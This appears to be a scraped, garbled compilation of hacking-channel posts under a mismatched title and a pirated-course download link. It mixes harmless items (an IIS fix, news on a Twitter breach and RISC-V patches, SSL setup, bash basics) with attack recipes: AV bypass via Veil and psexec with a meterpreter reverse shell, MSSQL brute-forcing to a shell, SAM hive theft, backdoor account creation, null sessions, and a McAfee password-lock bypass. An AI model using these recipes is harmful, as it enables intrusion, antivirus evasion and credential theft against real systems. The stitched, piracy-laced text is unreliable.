A penetration tester’s guide to subdomain enumeration
for beginers

Data Visualization: A Lesson and Listen Series -2.01 GB-

https://www.lynda.com/Data-Science-tutorials/Data-Visualization-Storytelling-Information-Design/664825-2.html

https://mega.nz/folder/hJ4RlATA#nrsuZ-hxW57qc-A7yh5EVg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑fix hacked host- lls repair methodes :
> Combined with data sorting and repair plan:

Turn off NTFS 8.3 file format support. This feature is enabled by default, and it is not necessary for most users.

If you are a virtual host space user, please contact the space provider for repair. Vulnerability description: IIS short file name disclosure vulnerability, file enumeration vulnerability exists in IIS implementation, attackers can use this vulnerability to enumerate and obtain files in the root directory of the server.

1. Modify the registry key: (restart the server to take effect)

HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation

The value is 1.

2. Execute the DOS command, fsutil behavior set disable8dot3 1

3. If your web environment does not require asp.net support, you can enter the Internet Information Services (IIS) Manager --- Web Service Extensions-ASP.NET to choose to disable this function.

4. Upgrade net framework to version 4.0 or higher.

5. Delete the existing IIS directory and redeploy, and complete this step to completely repair it.

Copy the contents of the web folder to another location, such as D:\www to D:\www.back, then delete the original folder D:\www, and then rename D:\www.back to D:\www. If you do not copy again, the existing short file name will not disappear.

This operation has been scanned for security penetration, and no IIS short file vulnerabilities have been found.

ENJOY ❤️👍
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Twitter is afraid of being investigated again and proactively report hacking incidents to the EU
#NEWS

> Sina Technology News on the evening of July 22, Beijing time, according to foreign media reports, a few days after the worst security breach in the company’s history, TwitterTake the initiative to report the incident to the EU data protection agency.

> Graham Doyle, spokesperson for the EU data protection agency, the Irish Data Protection Commission (DPC), said today that the regulator has received notification of the incident. DPC is the main regulatory agency for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.

>Currently, Twitter is working hard to deal with this most serious security incident. Twitter announced on Wednesday night that hackers had hijacked including Democratic presidential candidate Joe Biden, former President Barack Obama, and reality TV star Kim Kardai by obtaining control of Twitter employee credentials. Shan (Kim Kardashian) and tech billionaire and TeslaAccounts including founder Elon Musk.

> Twitter later stated that the hackers locked 130 accounts this time, controlled 45 of them by resetting their passwords, and issued "tweets" (Twitter messages) through them. In addition, Twitter also confirmed that the attackers successfully manipulated a small number of internal employees and used their credentials to access Twitter's internal systems.

> In May 2018, the EU’s new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated for user data tracking in Europe. This is also the first time that Twitter has encountered an investigation after the GDPR took effect. (Li Ming)


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AVBypass :

  Generate executable using Veil.

2)  In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set RHOST 192.168.0.2

RHOST => 192.168.0.2

msf exploit(psexec) > set SMBUser user

SMBUser => user

msf exploit(psexec) > set SMBPass pass

SMBPass => pass

msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe

EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe

msf exploit(psexec) > exploit

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BUILD YOUR OWN ApacheSSL:

# Enabling Self signed certificates on local website

1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available creating a symbolic link

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certs:

SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AttackingMSSQL -
Attacking MSSQL with Metasploit

 Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

enjoy❤️👍🏻

✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Simple Bash Scripting :

+ nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.

+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file

+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp

+ How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.

+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.

+ Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.

+ Word Count
wc -l tmp2 Count the number of lines in a file

+ cut
-d delimiter
-f fields

+ sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address

+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.

+ grep
grep -v Remove a single string.
grep -v 'red' file

+ egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file

+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Create a Bash Scripts Example :

+ Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."

+ Make a file executable.
chmod +x file
chmod 755 file

+ Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1
echo "Hello" $name "Your IP address is:" $ip

+ User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

+ Check For No User Input
if -z $domain ; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi

+ For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
command $host
done

+ One Liners

Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done

Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done


+ Condition Onliner


any command && if work || if not work
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"


+ Condition Onliner with multiple action


any command && { if work; also this; also this } || { if not work; also this; also this }
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A good guide helpful Build Review :


+ Main tasks:

Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).

+ Windows Hosts:

+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy

+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing

+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders

+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Helpful systeminfo command
#requested

1️⃣BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)

2️⃣Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update

3️⃣Anti-Virus
- config
- logs
- version
- dates
- EICAR

4️⃣cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP addressorhost name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist

5️⃣mount usb
usb autostart

6️⃣copy over files
- nc
- enum
- nmap
- DIRE
- EICAR


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Locate ubuntu files
> SAM files in backtrack

/Windows/System32/config/SAM SECURITY SYSTEM

# mounting on desktop review
# mount <target> <mydir>
# sda1 = client hdd, sdb2 = my usb part 2
# mkdir /mnt/client-hdd
# mount /dev/sda1 /mnt/client-hdd
# mkdir /mnt/win-usb
# mount /dev/sdb2 /mnt/win-usb

hosts file C:\Windows\System32\drivers\etc\hosts.txt

SYSVOL GPO preference item, check for obscured passwords in xml
http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx

🦑The history file is readable by any authenticated user, as shown below:

C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user:
\\DomainController\sysvol\DomainName\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The developer added a series of RISC-V UEFI support patches for Linux:
#NEWS

> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed, forming a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, developers have submitted a series of patches to solve a large number of problems and add some new capabilities to support RISC-V UEFI under Linux.

> Developer Atish Patra comes from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that can fix some common efi and riscv issues; patches 7-9 add The efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different codes; patch 11 adds runtime services to RISC-V.

🦑 In summary, the main contributions of this series of patches are:

1) Added full ioremap support.

2) Added efi runtime service support.

3) Fixed the mm problem.

4) At present, the patch has been verified by using the bootefi command in U-Boot on Qemu, and it has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems with the EDK2 code on RISC-V are still being solved, mainly related to SPI and network drivers.

> This series of patches are applied to the Linux kernel 5.8-rc2 and is currently in PR status, waiting for code review. If the related problems are solved and finally accepted, they should be visible when Linux 5.8 is released.


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑McAfee VirusScan console user unlock password forgotten solutions:

1) If the user unlocking password of the McAfee VirusScan console is forgotten, the following solutions can be taken:

2) restart the computer, enter the safe mode, and then open the registry, find

>HKEYLOCALMACHINE\SOFTWARE\McAfee\DesktopProtection
3) in the registry, and then find the UIP subkey, delete the subkey To restart.

4) Or I have
installed McAfee 8.5i, and the password cannot be unlocked if I forget the password. Look at the Internet and say that delete

>HKEYLOCALMACHINE\SOFTWARE\McAfee\DesktopProtection\UIP in safe mode. If

5) we don’t have that condition, we will try to modify the original one and replace it with a known one.

admin:19a2854144b63a8f7617a6f225019b12

6) If modification is forbidden, try ice blade, but it doesn't work, call the computer room to reinstall the system.

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁